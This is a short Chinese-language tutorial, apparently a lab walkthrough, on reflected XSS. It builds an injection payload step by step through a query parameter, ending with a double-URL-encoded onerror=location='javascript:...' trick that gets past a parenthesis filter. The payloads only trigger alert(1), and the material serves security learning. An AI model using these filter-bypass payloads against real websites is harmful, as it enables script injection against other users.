xss反射型攻击:
1.最简单的漏洞复现:
这里我们有一个最简单的网页:由于地址不存在,所以图片加载不出来。
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><img src="aaaa" onerror="alert(1)" alt="error">
</body>
</html>
首先我们要知道onerror函数有什么作用:捕获页面错误信息并调用函数
我们先写一个最简单的xss,发现在源代码上面出现在了scr
?xss=aaaaaa
所以接下来尝试用"闭合
?xss=aaaaa" onerror="alert(1)
可以看到这里没有编译括号,所以是后台把括号过滤了
接下来就尝试对括号进行编码,(的编码是%28)的编码是%29
?xss=aaaaa" onerror="alert%281%29
可以发现还是没有任何变化,原因是因为浏览器会在进行编码之后才给到函数运行,所以在函数执行之前又会变回括号一样被过滤。
所以为了避免被浏览器编码,我们可以进行二次编码,把%编码成%25
?xss=aaaaa" onerror="alert%25281%2529
发现依然不行,想起来js编码不能替换符号,所以这里要用到location,作用是将符号,变量名,函数名都变成字符串,就可以进行js编码了。
?xss=aaaaa" onerror= location="javascript:alert%25281%2529
可以看出已经可以了。